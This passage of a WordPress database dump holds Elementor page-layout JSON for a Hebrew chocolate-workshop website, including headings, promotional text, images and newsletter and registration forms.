":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(646,141,'_elementor_version','0.4'),(647,144,'_wp_page_template','elementor_canvas'),(648,144,'_elementor_edit_mode','builder'),(649,144,'_elementor_template_type','post'),(650,144,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\